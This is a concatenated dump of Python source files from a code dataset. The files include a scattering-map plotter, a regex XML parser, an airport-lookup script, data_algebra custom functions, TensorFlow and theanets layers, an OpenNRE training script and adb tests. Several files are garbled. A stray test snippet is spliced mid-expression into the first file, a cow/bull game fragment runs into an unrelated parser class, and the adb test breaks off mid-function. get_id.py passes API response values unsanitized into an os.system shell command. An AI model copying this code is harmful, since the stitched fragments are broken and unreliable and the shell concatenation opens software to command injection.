0.5 * dotV(qp[0]), qp[1] - 0.5 * dotV(qp[0]) - 0.5 * dotV(qp[0] + qp[1] - 0.5 * dotV(qp[0]))],dtype = np.float64)\n    \n    #inverse map\n    def Ui(self,qp):\n        return np.array([qp[0] - qp[1] - 0.5 * dotV(qp[0]), qp[1] + 0.5 * dotV(qp[0]) + 0.5 * dotV(qp[0] - qp[1] - 0.5 * dotV(qp[0]))],dtype = np.float64)\n\n\ndef ScattMapt(qp,iterate1):\n    for i in range(iterate1):\n        qp = cmap.U(qp)\n    return np.array([qp[0],qp[1]],dtype = np.float64)\ndef ScattMapti(qp,iterate1):\n    for i in range(iterate1):\n        qp = cmap.Ui(qp)\n    return np.array([qp[0],qp[1]], dtype = np.float64)\n\ndef dotV(x):\n    return k * x * np.exp(-8 * x**2) - e2 * (np.exp(-8 * pow(x - xb, 2)) - np.exp(-8 * pow(x + xb, 2)))\n\n\ndef Mapline(x,lines,iterate1):#feed in x yourself and advance the map.\n    y = lines(x,0)\n    for i in range(iterate1):\n        [x,y] = cmap.Ui([x,y])\n    return [x,y]\n\ndef symline1(x,iterate1): #period 2i+1\n    y = 2 * x - (1/2) * dotV(x)\n    for i in range(iterate1):\n        [x,y] = cmap.Ui([x,y])\n    return y\ndef symline2(x,iterate2): #period 2i+1\n    y = - (1/2) * dotV(x)\n    for i in range(iterate2):\n        [x,y] = cmap.Ui([x,y])\n    return y\ndef symline3(x,iterate3):#period 2i\n    y = np.zeros(len(x))\n    for i in range(iterate3):\n        [x,y] = cmap.Ui([x,y])\n    return y\ndef symline4(y,iterate4):#period 2i\n    x = np.zeros(len(y))\n    for i in range(iterate4):\n        [x,y] = cmap.Ui([x,y])\n    return x\n\ncmap = KScatteringMap(k,xf,xb)\n\ndef main():\n    iterate1 = 3\n    iterate2 = 0\n    x = np.linspace(-1.3, 1.3, 20)\n    y1 = symline1(x,iterate1)\n    y2 = symline2(x,iterate2)\n    #plt.plot(x, y1, marker='o', mec='none', ms=4, lw=1, label='y1')\n    #plt.plot(x, y2, marker='o', mec='none', ms=4, lw=1, label='y2')\n    np.set_printoptions(precision = 12)\n    idx = np.argwhere(np.diff(np.sign(y1 - y2)) != 0)\n    print(idx) #we badly want these crossing indices.\n    x3,y3 = Mapline(x,symline1,iterate1)\n    x4,y4 = Mapline(x,symline2,iterate2)\n    plt.plot(x3,y3,marker = 'o',mec = 'none',ms = 4, lw = 1, label = 'y1')\n    plt.plot(x4, y4, marker='o', mec='none', ms=4, lw = 1, label='y2')\n    plt.plot(x3[idx], 
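interpolated_intercepts above is easy to sanity-check on two straight lines whose crossing is known in closed form (a sketch; run inside this module):

import numpy as np

xs = np.linspace(0.0, 1.0, 10)
xc, yc = interpolated_intercepts(xs, xs, 1.0 - xs)  # y = x versus y = 1 - x
print(xc.ravel(), yc.ravel())                       # both [0.5]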
y3[idx], 'ms', ms=7, label='Nearest data-point method')\n    # new method!\n    xcs, ycs = interpolated_intercepts(x,y1,y2)\n    for xc, yc in zip(xcs, ycs):\n        plt.plot(xc, yc, 'co', ms=5)\n    #print(xgenuine,ygenuine)\n    plt.legend(frameon=False, fontsize=10, numpoints=1, loc='lower left')\n    plt.savefig('symmetryline.png', dpi=200)\n    plt.show()\n\nif __name__ == '__main__': \n    main()\n","sub_path":"interpolatetest.py","file_name":"interpolatetest.py","file_ext":"py","file_size_in_byte":4752,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"}
{"seq_id":"112743649","text":"Bonus\r\na=0\r\nb=0\r\ndef myfun():\r\n    global a,b\r\n    n=int(input(\"Enter a number\"))\r\n    if num==n:\r\n        a=a+1\r\n    \r\n    print(\" {} cow\\n {} bull\\n\".format(a,b))\r\n    self.regex_web = re.compile(r'([\\s\\S]+)', flags=re.M)\n        # replace regex to scrub HTML tags\n        self.regex_html_tag = re.compile(r'<[^>]+>', flags=re.M | re.DOTALL)\n\n    def extract_element_content(self, tag, content):\n        # compile a regex for this tag on demand\n        if tag not in self.regex_dict:\n            self.regex_dict[tag] = re.compile(rf'<{tag}>([\\s\\S]*?)<\\/{tag}>', flags=re.M)\n\n        # match the element pattern and return its inner text\n        regex = self.regex_dict[tag]\n        match = regex.search(content).group(1).strip()\n\n        return match\n\n    def extract_html_text(self, content):\n        # find the content of the webpage (requires regex because it's not element-enclosed)\n        raw_match = self.regex_web.search(content).group(1).strip()\n        # clean up the HTML tags inside the content by regex replace\n        match_untagged = self.regex_html_tag.sub('', raw_match).strip()\n\n        return match_untagged\n","sub_path":"src/PreProcessData/XmlParseService.py","file_name":"XmlParseService.py","file_ext":"py","file_size_in_byte":1213,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"}
{"seq_id":"346129646","text":"from regression_test_utils import log_test_case\nimport logging\nlogger = logging.getLogger(__name__)\n\nlogging.basicConfig(filename='test_log.log', level=logging.DEBUG)\n\nclass test_program(object):\n\n\t@log_test_case(logger, __name__)\n\tdef combine(method_name, log_file):\n\t\tresult = method_name + \" \" + log_file\n\t\treturn result;\n\n\tcombine('my_method,', 'results')\n","sub_path":"regression_test_utils/combine.py","file_name":"combine.py","file_ext":"py","file_size_in_byte":360,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"}
{"seq_id":"37151811","text":"import urllib ,sys , json , os, time\n\nAPI_KEY = '*******************'\n\nresponse = urllib.urlopen('http://api.sandbox.amadeus.com/v1.2/airports/autocomplete?apikey='+API_KEY +'&term='+ sys.argv[1])\n\nresponseText = json.loads(response.read())\n\nall_prf = len(responseText)\ninfo_origin = []\nfor i in range(0,all_prf):\n    info_origin.append(responseText[i]['value'])\n    info_origin.append(responseText[i]['label'])\n    os.system('python /home/shreyakupadhyay/Documents/yatra-hackathon/get_flights.py ' + str(responseText[i]['value']) + ' ' + 'BLR')\n","sub_path":"get_id.py","file_name":"get_id.py","file_ext":"py","file_size_in_byte":546,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"}
{"seq_id":"194186637","text":"import numpy\n\nimport data_algebra\nimport data_algebra.util\nimport data_algebra.connected_components\n\n\nclass CustomFunction:\n    def __init__(self, name, pandas_formatter, implementation):\n        self.name = name\n        self.pandas_formatter = pandas_formatter\n        self.implementation = 
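The per-tag pattern that extract_element_content above compiles on demand behaves like this (sketch):

import re

tag = 'title'
pattern = re.compile(rf'<{tag}>([\s\S]*?)<\/{tag}>', flags=re.M)
print(pattern.search('<doc><title>Hello</title></doc>').group(1))  # Hello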
implementation\n\n def format_for_pandas(self, expr):\n return self.pandas_formatter(expr)\n\n\ndef make_custom_function_map(data_model):\n if data_model is None:\n data_model = data_algebra.default_data_model\n custom_functions = [\n CustomFunction(\n name=\"is_bad\",\n pandas_formatter=lambda expr: \"@is_bad(\" + expr.args[0].to_pandas() + \")\",\n implementation=lambda x: data_model.bad_column_positions(x),\n ),\n CustomFunction(\n name=\"is_null\",\n pandas_formatter=lambda expr: \"@is_null(\" + expr.args[0].to_pandas() + \")\",\n implementation=lambda x: data_model.isnull(x),\n ),\n CustomFunction(\n name=\"if_else\",\n pandas_formatter=lambda expr: (\n \"@if_else(\"\n + expr.args[0].to_pandas()\n + \", \"\n + expr.args[1].to_pandas()\n + \", \"\n + expr.args[2].to_pandas()\n + \")\"\n ),\n implementation=lambda c, x, y: numpy.where(c, x, y),\n ),\n CustomFunction(\n name=\"neg\",\n pandas_formatter=lambda expr: \"-\"\n + expr.args[0].to_pandas(want_inline_parens=True),\n implementation=lambda x: numpy.negative(x),\n ),\n CustomFunction(\n name=\"co_equalizer\",\n pandas_formatter=lambda expr: (\n \"@co_equalizer(\"\n + expr.args[0].to_pandas()\n + \", \"\n + expr.args[1].to_pandas()\n + \")\"\n ),\n implementation=lambda f, g: data_algebra.connected_components.connected_components(\n f, g\n ),\n ),\n CustomFunction(\n name=\"connected_components\",\n pandas_formatter=lambda expr: (\n \"@connected_components(\"\n + expr.args[0].to_pandas()\n + \", \"\n + expr.args[1].to_pandas()\n + \")\"\n ),\n implementation=lambda f, g: data_algebra.connected_components.connected_components(\n f, g\n ),\n ),\n CustomFunction(\n name=\"partitioned_eval\",\n pandas_formatter=lambda expr: (\n \"@partitioned_eval(\"\n # expr.args[0] is a FnTerm\n + \"@\"\n + expr.args[0].to_pandas()\n + \", \"\n # expr.args[1] is a ListTerm\n + \"[\"\n + \", \".join([ei.to_pandas() for ei in expr.args[1].value])\n + \"]\"\n + \", \"\n # expr.args[2] is a ListTerm\n + \"[\"\n + \", \".join([ei.to_pandas() for ei in expr.args[2].value])\n + \"]\"\n + \")\"\n ),\n implementation=lambda fn, arg_columns, partition_columns: (\n data_algebra.connected_components.partitioned_eval(\n fn, arg_columns, partition_columns\n )\n ),\n ),\n CustomFunction(\n name=\"max\",\n pandas_formatter=lambda expr: (\"@max(\" + expr.args[0].to_pandas() + \")\"),\n implementation=lambda x: [numpy.max(x)] * len(x),\n ),\n CustomFunction(\n name=\"min\",\n pandas_formatter=lambda expr: (\"@min(\" + expr.args[0].to_pandas() + \")\"),\n implementation=lambda x: [numpy.min(x)] * len(x),\n ),\n CustomFunction(\n name=\"fn\", # special case, user defined function\n pandas_formatter=lambda expr: \"@fn(\" + expr.args[0].to_pandas() + \")\",\n implementation=None,\n ),\n ]\n mp = {cf.name: cf for cf in custom_functions}\n return mp\n","sub_path":"data_algebra/custom_functions.py","file_name":"custom_functions.py","file_ext":"py","file_size_in_byte":4066,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"281247869","text":"# -*- coding: utf-8 -*-\nfrom ..layer_operation import LayerOperation\nimport tensorflow as tf\nimport re\n\nclass op_tf_c_momentumoptimizer(LayerOperation):\n\n _attributes = \"\"\"[\\\n {\"default\": 0.9, \"source\": \"opt\", \"mandatory\": \"both\", \"name\": \"momentum\"}]\"\"\"\n\n def compile_time_operation(self, learning_option, cluster):\n pass\n\n def run_time_operation(self, learning_option, cluster):\n def apiConstructor(input_, learning_rate, momentum, use_nesterov):\n 
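The if_else entry in the record above reduces to numpy.where; its element-wise selection in two lines (a sketch):

import numpy as np

c = np.array([True, False, True])
print(np.where(c, 10, -1))  # [10 -1 10]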
momentumopt = tf.train.MomentumOptimizer(learning_rate, momentum, use_nesterov=use_nesterov)\n            momentumopt_ = momentumopt.minimize(input_, colocate_gradients_with_ops=True, global_step=global_step)\n            return momentumopt_\n\n        learning_rate = learning_option.get(\"learning_rate\")\n        momentum = learning_option.get(\"momentum\", self.momentum)\n        use_nesterov = False  # Nesterov momentum is provided by the separate nesterovoptimizer operation\n        input_ = self.get_input('loss')\n\n        device = self.get_attr('device')\n        num = re.sub('[^0-9]', '', cluster.get('types')[device])\n        type = cluster.get('types')[device].replace(str(num), '')\n\n        with tf.name_scope(self.name) as scope:\n            global_step = tf.train.get_or_create_global_step()\n            if learning_option.get(\"parallel\", None) != \"DP\":\n                with tf.device('/job:worker/task:{0}/{1}:{2}'.format(device, type, num)):\n                    momentumopt_ = apiConstructor(input_, learning_rate, momentum, use_nesterov)\n            else:\n                momentumopt_ = apiConstructor(input_, learning_rate, momentum, use_nesterov)\n            self.set_output('output', momentumopt_)\n            self.set_output('global_step', global_step)","sub_path":"src/DLMDL/LayerOperation/tf.old/c_momentumoptimizer.py","file_name":"c_momentumoptimizer.py","file_ext":"py","file_size_in_byte":1724,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"}
{"seq_id":"112250713","text":"#!/usr/bin/python\n# coding:utf-8\n# Copyright (C) 2005-2016 All rights reserved.\n# FILENAME: \t requests_pkg.py\n# VERSION: \t 1.0\n# CREATED: \t 2016-01-14 20:25\n# AUTHOR: \t xuexiang\n# DESCRIPTION: wrapper around the requests library\n#\n# HISTORY:\n#*************************************************************\nimport time\nimport requests\nfrom random_useragent import getRandomUA\n\n\ndef get(url, max_try=3, timeout=100):\n    try_count = 0\n    while True:\n        h_heads = getRandomUA()\n        resp = requests.get(url, headers=h_heads, timeout=timeout)\n        try_count += 1\n        if resp:\n            return resp\n        else:\n            if try_count >= max_try:\n                return None\n        time.sleep(3)\n","sub_path":"email_server/requests_pkg.py","file_name":"requests_pkg.py","file_ext":"py","file_size_in_byte":706,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"}
{"seq_id":"199887875","text":"#! 
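The get() wrapper above is a small bounded-retry loop; the same control flow in isolation, without the user-agent rotation and sleep (sketch):

def retry(fn, max_try=3):
    try_count = 0
    while True:
        result = fn()
        try_count += 1
        if result:
            return result
        if try_count >= max_try:
            return None

print(retry(lambda: 0) is None)  # falsy results exhaust the retries -> True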
/usr/bin/python3\n\nimport sys\nimport math\nimport random\nfrom collections import Counter\n\nSEED = 782\nrandom.seed(SEED)\ntrain_file = open(\"data/NLSPARQL.train.data\", \"r\")\ntrain_feat = open(\"data/NLSPARQL.train.feats.txt\", \"r\")\n\nlexicon_word = open(\"data/lexicon_word_enanched.txt\", \"w\")\nlexicon_label = open(\"data/lexicon_label_enanched.txt\", \"w\")\n\ntraining_set = open(\"data/training_set_enanched\", \"w\")\nvalidation_set = open(\"data/validation_set_enanched\", \"w\")\n\ntest_file = open(\"data/NLSPARQL.test.data\", \"r\")\ntest_feat = open(\"data/NLSPARQL.test.feats.txt\", \"r\")\n\nsplit_f = train_feat.read().split('\\n')\nsplit_t = train_file.read().split('\\n')\nsplit_test_f = test_feat.read().split('\\n')\nsplit_test_t = test_file.read().split('\\n')\nvalidation_set_len = int(sys.argv[1])\nword_lemma_pos_iob = []\nwords = []\niob = []\nline = []\nsentences = []\n\nfor x,y in zip(split_t, split_f):\n    if x != '' and y != '':\n        a, b = x.split('\\t') #word iob\n        c, d, e = y.split('\\t') #word pos lemma\n        if b == \"O\":\n            words.append(a)\n            iob.append(\"$-\"+a)\n            line.append((a, \"$-\"+a))\n        else:\n            words.append(a)\n            iob.append(b)\n            line.append((a,b))\n    else:\n        sentences.append(line)\n        line = []\n\nfor x,y in zip(split_test_t, split_test_f):\n    if x != '' and y != '':\n        a, b = x.split('\\t') #word iob\n        c, d, e = y.split('\\t') #word pos lemma\n        iob.append(b)\n\nrandom.shuffle(sentences)\n###########################################################################################################\n# LEXICON WORD\n\ncounted_words = Counter(words)\nconta = 0\n\nfor i in counted_words:\n    lexicon_word.write(str(i) + \"\\t\" + str(conta) + \"\\n\")\n    conta += 1\n\nlexicon_word.write(\"<unk>\\t\" + str(conta) + \"\\n\")\n\n###########################################################################################################\n# LEXICON IOB\n\ncounted_iob = Counter(iob)\nconta1 = 0\n\nfor i in counted_iob:\n    lexicon_label.write(str(i) + \"\\t\" + str(conta1) + \"\\n\")\n    conta1 += 1\n\n###########################################################################################################\n\nvalidation_data = sentences[:validation_set_len]\ntrain_data = sentences[validation_set_len:]\n\nfor i in train_data:\n    for x in i:\n        training_set.write(str(x[0]) + \"\\t\" + str(x[1]) + \"\\n\")\n    training_set.write(\"\\n\")\n\nfor i in validation_data:\n    for x in i:\n        validation_set.write(str(x[0]) + \"\\t\" + str(x[1]) + \"\\n\")\n    validation_set.write(\"\\n\")\n","sub_path":"RNN/generator_file_enanched.py","file_name":"generator_file_enanched.py","file_ext":"py","file_size_in_byte":2564,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"}
{"seq_id":"78585112","text":"import climate\nimport numpy as np\nimport theanets\nimport theano\nimport theano.tensor as TT\n\ng = climate.add_group('ARRNN Experiment')\ng.add_argument('--model', metavar='rnn|arrnn|mrnn|lstm',\n               help='use this recurrent model')\ng.add_argument('--size', type=int, metavar='N',\n               help='use N units in recurrent layer')\n\n\ndef build(args, in_dim=1, out_dim=1):\n    return theanets.Experiment(\n        theanets.recurrent.Regressor,\n        layers=(in_dim, (args.model, args.size), out_dim),\n        batch_size=args.batch_size,\n    )\n\n\nRRNN = theanets.layers.RNN\nLEVELS = (0.1, 0.3, 0.5, 0.7, 0.9)\n\n\nclass FR(RRNN):\n    '''RNN with fixed rates.'''\n\n    def __init__(self, *args, **kwargs):\n        super(FR, self).__init__(*args, **kwargs)\n        self.rate = theano.shared(\n            np.linspace(0, 1, self.nout + 
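The rate-based layers in the record that begins above (FR and the learnable variants that follow) all share one update rule: a per-unit rate r interpolates between the previous hidden state and the freshly computed one, h_t = r * h_{t-1} + (1 - r) * h_t'. In plain numpy (sketch):

import numpy as np

r = np.array([0.1, 0.9])             # per-unit rates; a large rate means a slow, leaky unit
h_prev = np.zeros(2)
h_new = np.ones(2)
print(r * h_prev + (1 - r) * h_new)  # [0.9 0.1]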
2)[1:-1].astype('f'),\n self._fmt('r'))\n\n def transform(self, inputs):\n def fn(x_t, h_tm1):\n r_t = self.rate\n h_t = self.activate(x_t + TT.dot(h_tm1, self.find('hh')))\n return r_t * h_tm1 + (1 - r_t) * h_t\n x = TT.dot(inputs, self.find('xh')) + self.find('b')\n output, updates = self._scan(fn, [x])\n monitors = self._monitors(output) + self._monitors(\n self.rate, 'rate', levels=LEVELS)\n return output, monitors, updates\n\n\nclass LR(RRNN):\n '''RNN with learnable rate vector.'''\n\n def setup(self):\n self.log_setup(self.add_weights('xh') +\n self.add_weights('hh', self.nout) +\n self.add_bias('b') +\n self.add_bias('r'))\n\n def transform(self, inputs):\n def fn(x_t, h_tm1):\n r_t = TT.nnet.sigmoid(self.find('r'))\n h_t = self.activate(x_t + TT.dot(h_tm1, self.find('hh')))\n return r_t * h_tm1 + (1 - r_t) * h_t\n x = TT.dot(inputs, self.find('xh')) + self.find('b')\n output, updates = self._scan(fn, [x])\n monitors = self._monitors(output) + self._monitors(\n self.find('r'), 'rate', levels=LEVELS)\n return output, monitors, updates\n\n\nclass LIR(RRNN):\n '''RNN with rates computed from input values.'''\n\n def setup(self):\n self.log_setup(self.add_weights('xh') +\n self.add_weights('xr') +\n self.add_weights('hh', self.nout) +\n self.add_bias('b') +\n self.add_bias('r'))\n\n def transform(self, inputs):\n def fn(x_t, r_t, h_tm1):\n h_t = self.activate(x_t + TT.dot(h_tm1, self.find('hh')))\n return r_t * h_tm1 + (1 - r_t) * h_t\n x = inputs\n h = TT.dot(x, self.find('xh')) + self.find('b')\n r = TT.nnet.sigmoid(TT.dot(x, self.find('xr')) + self.find('r'))\n output, updates = self._scan(fn, [h, r], [x])\n monitors = self._monitors(output) + self._monitors(\n r, 'rate', levels=LEVELS)\n return output, monitors, updates\n\n\nclass LIHR(RRNN):\n '''RNN with rates computed from hiddens and inputs.'''\n\n def setup(self):\n self.log_setup(self.add_weights('xh') +\n self.add_weights('xr') +\n self.add_weights('hh', self.nout) +\n self.add_weights('hr', self.nout) +\n self.add_bias('b') +\n self.add_bias('r'))\n\n def transform(self, inputs):\n def fn(x_t, r_t, h_tm1):\n r_t = TT.nnet.sigmoid(r_t + TT.dot(h_tm1, self.find('hr')))\n h_t = self.activate(x_t + TT.dot(h_tm1, self.find('hh')))\n return r_t, r_t * h_tm1 + (1 - r_t) * h_t\n x = inputs\n h = TT.dot(x, self.find('xh')) + self.find('b')\n r = TT.nnet.sigmoid(TT.dot(x, self.find('xr')) + self.find('r'))\n (rate, output), updates = self._scan(fn, [h, r], [None, x])\n monitors = self._monitors(output) + self._monitors(\n rate, 'rate', levels=LEVELS)\n return output, monitors, updates\n","sub_path":"tasks/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":4000,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"428048029","text":"import pytest\n\ndef add(a, b):\n return a + b\n\n@pytest.mark.parametrize(\"a, b, expected\", [\n (1, 2, 3),\n (0, 0, 0),\n])\n@pytest.mark.parametrize(\"description\", [\n \"positive numbers\",\n \"zeroes\",\n])\ndef test_addition(a, b, expected, description):\n result = add(a, b)\n assert result == expected, description\n","sub_path":"python/python_cli2/tests/test_param.py","file_name":"test_param.py","file_ext":"py","file_size_in_byte":323,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"352919619","text":"# coding:utf-8\nimport sys, json\nimport torch\nimport os\nimport numpy as np\nimport opennre\nimport argparse\nimport logging\nimport random\n\ndef set_seed(seed):\n 
random.seed(seed)\n np.random.seed(seed)\n torch.manual_seed(seed)\n torch.cuda.manual_seed_all(seed)\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--ckpt', default='', \n help='Checkpoint name')\nparser.add_argument('--result', default='', \n help='Save result name')\nparser.add_argument('--only_test', action='store_true', \n help='Only run test')\n\n# Data\nparser.add_argument('--metric', default='auc', choices=['micro_f1', 'auc'],\n help='Metric for picking up best checkpoint')\nparser.add_argument('--dataset', default='none', choices=['none', 'wiki_distant', 'nyt10', 'nyt10m', 'wiki20m'],\n help='Dataset. If not none, the following args can be ignored')\nparser.add_argument('--train_file', default='', type=str,\n help='Training data file')\nparser.add_argument('--val_file', default='', type=str,\n help='Validation data file')\nparser.add_argument('--test_file', default='', type=str,\n help='Test data file')\nparser.add_argument('--rel2id_file', default='', type=str,\n help='Relation to ID file')\n\n# Bag related\nparser.add_argument('--bag_size', type=int, default=0,\n help='Fixed bag size. If set to 0, use original bag sizes')\n\n# Hyper-parameters\nparser.add_argument('--batch_size', default=160, type=int,\n help='Batch size')\nparser.add_argument('--lr', default=0.1, type=float,\n help='Learning rate')\nparser.add_argument('--optim', default='sgd', type=str,\n help='Optimizer')\nparser.add_argument('--weight_decay', default=1e-5, type=float,\n help='Weight decay')\nparser.add_argument('--max_length', default=128, type=int,\n help='Maximum sentence length')\nparser.add_argument('--max_epoch', default=100, type=int,\n help='Max number of training epochs')\n\n# Others\nparser.add_argument('--seed', default=42, type=int,\n help='Random seed')\n\n# Exp\nparser.add_argument('--encoder', default='pcnn', choices=['pcnn', 'cnn'])\nparser.add_argument('--aggr', default='att', choices=['one', 'att', 'avg'])\n\nargs = parser.parse_args()\n\n# Set random seed\nset_seed(args.seed)\n\n# Some basic settings\nroot_path = '.'\nsys.path.append(root_path)\nif not os.path.exists('ckpt'):\n os.mkdir('ckpt')\nif len(args.ckpt) == 0:\n args.ckpt = '{}_{}'.format(args.dataset, 'pcnn_att')\nckpt = 'ckpt/{}.pth.tar'.format(args.ckpt)\n\nif args.dataset != 'none':\n opennre.download(args.dataset, root_path=root_path)\n args.train_file = os.path.join(root_path, 'benchmark', args.dataset, '{}_train.txt'.format(args.dataset))\n args.val_file = os.path.join(root_path, 'benchmark', args.dataset, '{}_val.txt'.format(args.dataset))\n if not os.path.exists(args.val_file):\n logging.info(\"Cannot find the validation file. Use the test file instead.\")\n args.val_file = os.path.join(root_path, 'benchmark', args.dataset, '{}_test.txt'.format(args.dataset))\n args.test_file = os.path.join(root_path, 'benchmark', args.dataset, '{}_test.txt'.format(args.dataset))\n args.rel2id_file = os.path.join(root_path, 'benchmark', args.dataset, '{}_rel2id.json'.format(args.dataset))\nelse:\n if not (os.path.exists(args.train_file) and os.path.exists(args.val_file) and os.path.exists(args.test_file) and os.path.exists(args.rel2id_file)):\n raise Exception('--train_file, --val_file, --test_file and --rel2id_file are not specified or files do not exist. 
Or specify --dataset')\n\nlogging.info('Arguments:')\nfor arg in vars(args):\n logging.info(' {}: {}'.format(arg, getattr(args, arg)))\n\nrel2id = json.load(open(args.rel2id_file))\n\n# Download glove\nopennre.download('glove', root_path=root_path)\nword2id = json.load(open(os.path.join(root_path, 'pretrain/glove/glove.6B.50d_word2id.json')))\nword2vec = np.load(os.path.join(root_path, 'pretrain/glove/glove.6B.50d_mat.npy'))\n\n# Define the sentence encoder\nif args.encoder == 'pcnn':\n sentence_encoder = opennre.encoder.PCNNEncoder(\n token2id=word2id,\n max_length=args.max_length,\n word_size=50,\n position_size=5,\n hidden_size=230,\n blank_padding=True,\n kernel_size=3,\n padding_size=1,\n word2vec=word2vec,\n dropout=0.5\n )\nelif args.encoder == 'cnn':\n sentence_encoder = opennre.encoder.CNNEncoder(\n token2id=word2id,\n max_length=args.max_length,\n word_size=50,\n position_size=5,\n hidden_size=230,\n blank_padding=True,\n kernel_size=3,\n padding_size=1,\n word2vec=word2vec,\n dropout=0.5\n )\nelse:\n raise NotImplementedError\n\n\n# Define the model\nif args.aggr == 'att':\n model = opennre.model.BagAttention(sentence_encoder, len(rel2id), rel2id)\nelif args.aggr == 'avg':\n model = opennre.model.BagAverage(sentence_encoder, len(rel2id), rel2id)\nelif args.aggr == 'one':\n model = opennre.model.BagOne(sentence_encoder, len(rel2id), rel2id)\nelse:\n raise NotImplementedError\n\n# Define the whole training framework\nframework = opennre.framework.BagRE(\n train_path=args.train_file,\n val_path=args.val_file,\n test_path=args.test_file,\n model=model,\n ckpt=ckpt,\n batch_size=args.batch_size,\n max_epoch=args.max_epoch,\n lr=args.lr,\n weight_decay=args.weight_decay,\n opt=args.optim,\n bag_size=args.bag_size)\n\n# Train the model\nif not args.only_test:\n framework.train_model(args.metric)\n\n# Test the model\nframework.load_state_dict(torch.load(ckpt)['state_dict'])\nresult = framework.eval_model(framework.test_loader)\n\n# Print the result\nlogging.info('Test set results:')\nlogging.info('AUC: %.5f' % (result['auc']))\nlogging.info('Maximum micro F1: %.5f' % (result['max_micro_f1']))\nlogging.info('Maximum macro F1: %.5f' % (result['max_macro_f1']))\nlogging.info('Micro F1: %.5f' % (result['micro_f1']))\nlogging.info('Macro F1: %.5f' % (result['macro_f1']))\nlogging.info('P@100: %.5f' % (result['p@100']))\nlogging.info('P@200: %.5f' % (result['p@200']))\nlogging.info('P@300: %.5f' % (result['p@300']))\n\n# Save precision/recall points\nnp.save('result/{}_p.npy'.format(args.result), result['np_prec'])\nnp.save('result/{}_r.npy'.format(args.result), result['np_rec'])\njson.dump(result['max_micro_f1_each_relation'], open('result/{}_mmicrof1_rel.json'.format(args.result), 'w'), ensure_ascii=False)\n","sub_path":"example/train_bag_cnn.py","file_name":"train_bag_cnn.py","file_ext":"py","file_size_in_byte":6408,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"284657187","text":"#!/usr/bin/env python\n# Copyright 2016 The Chromium Authors. 
All rights reserved.\n# Use of this source code is governed by a BSD-style license that can be\n# found in the LICENSE file.\nfrom __future__ import print_function\n\nimport contextlib\nimport os\nimport posixpath\nimport random\nimport signal\nimport sys\nimport unittest\n\n_CATAPULT_BASE_DIR = os.path.abspath(\n os.path.join(os.path.dirname(__file__), '..', '..', '..', '..'))\n\nsys.path.append(os.path.join(_CATAPULT_BASE_DIR, 'devil'))\nfrom devil import devil_env\nfrom devil.android import device_errors\nfrom devil.android import device_test_case\nfrom devil.android.sdk import adb_wrapper\nfrom devil.utils import cmd_helper\nfrom devil.utils import timeout_retry\n\n_TEST_DATA_DIR = os.path.abspath(\n os.path.join(os.path.dirname(__file__), 'test', 'data'))\n\n\ndef _hostAdbPids():\n ps_status, ps_output = cmd_helper.GetCmdStatusAndOutput(\n ['pgrep', '-l', 'adb'])\n if ps_status != 0:\n return []\n\n pids_and_names = (line.split() for line in ps_output.splitlines())\n return [int(pid) for pid, name in pids_and_names if name == 'adb']\n\n\nclass AdbCompatibilityTest(device_test_case.DeviceTestCase):\n @classmethod\n def setUpClass(cls):\n custom_adb_path = os.environ.get('ADB_PATH')\n custom_deps = {\n 'config_type': 'BaseConfig',\n 'dependencies': {},\n }\n if custom_adb_path:\n custom_deps['dependencies']['adb'] = {\n 'file_info': {\n devil_env.GetPlatform(): {\n 'local_paths': [custom_adb_path],\n },\n },\n }\n devil_env.config.Initialize(configs=[custom_deps])\n\n def testStartServer(self):\n # Manually kill off any instances of adb.\n adb_pids = _hostAdbPids()\n for p in adb_pids:\n os.kill(p, signal.SIGKILL)\n\n self.assertIsNotNone(\n timeout_retry.WaitFor(\n lambda: not _hostAdbPids(), wait_period=0.1, max_tries=10))\n\n # start the adb server\n start_server_status, _ = cmd_helper.GetCmdStatusAndOutput(\n [adb_wrapper.AdbWrapper.GetAdbPath(), 'start-server'])\n\n # verify that the server is now online\n self.assertEquals(0, start_server_status)\n self.assertIsNotNone(\n timeout_retry.WaitFor(\n lambda: bool(_hostAdbPids()), wait_period=0.1, max_tries=10))\n\n def testKillServer(self):\n adb_pids = _hostAdbPids()\n if not adb_pids:\n adb_wrapper.AdbWrapper.StartServer()\n\n adb_pids = _hostAdbPids()\n self.assertGreaterEqual(len(adb_pids), 1)\n\n kill_server_status, _ = cmd_helper.GetCmdStatusAndOutput(\n [adb_wrapper.AdbWrapper.GetAdbPath(), 'kill-server'])\n self.assertEqual(0, kill_server_status)\n\n adb_pids = _hostAdbPids()\n self.assertEqual(0, len(adb_pids))\n\n def testDevices(self):\n devices = adb_wrapper.AdbWrapper.Devices()\n self.assertNotEqual(0, len(devices), 'No devices found.')\n\n def getTestInstance(self):\n \"\"\"Creates a real AdbWrapper instance for testing.\"\"\"\n return adb_wrapper.AdbWrapper(self.serial)\n\n def testShell(self):\n under_test = self.getTestInstance()\n shell_ls_result = under_test.Shell('ls')\n self.assertIsInstance(shell_ls_result, str)\n self.assertTrue(bool(shell_ls_result))\n\n def testShell_failed(self):\n under_test = self.getTestInstance()\n with self.assertRaises(device_errors.AdbShellCommandFailedError):\n under_test.Shell('ls /foo/bar/baz')\n\n def testShell_externalStorageDefined(self):\n under_test = self.getTestInstance()\n external_storage = under_test.Shell('echo $EXTERNAL_STORAGE')\n self.assertIsInstance(external_storage, str)\n self.assertTrue(posixpath.isabs(external_storage))\n\n @contextlib.contextmanager\n def getTestPushDestination(self, under_test):\n \"\"\"Creates a temporary directory suitable for pushing 
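# Illustrative stand-in (an assumption, not devil's actual implementation)
# with the same shape as the timeout_retry.WaitFor polling used above:
import time

def wait_for(condition, wait_period=0.1, max_tries=10):
    """Poll condition() until it is truthy; return None if it never is."""
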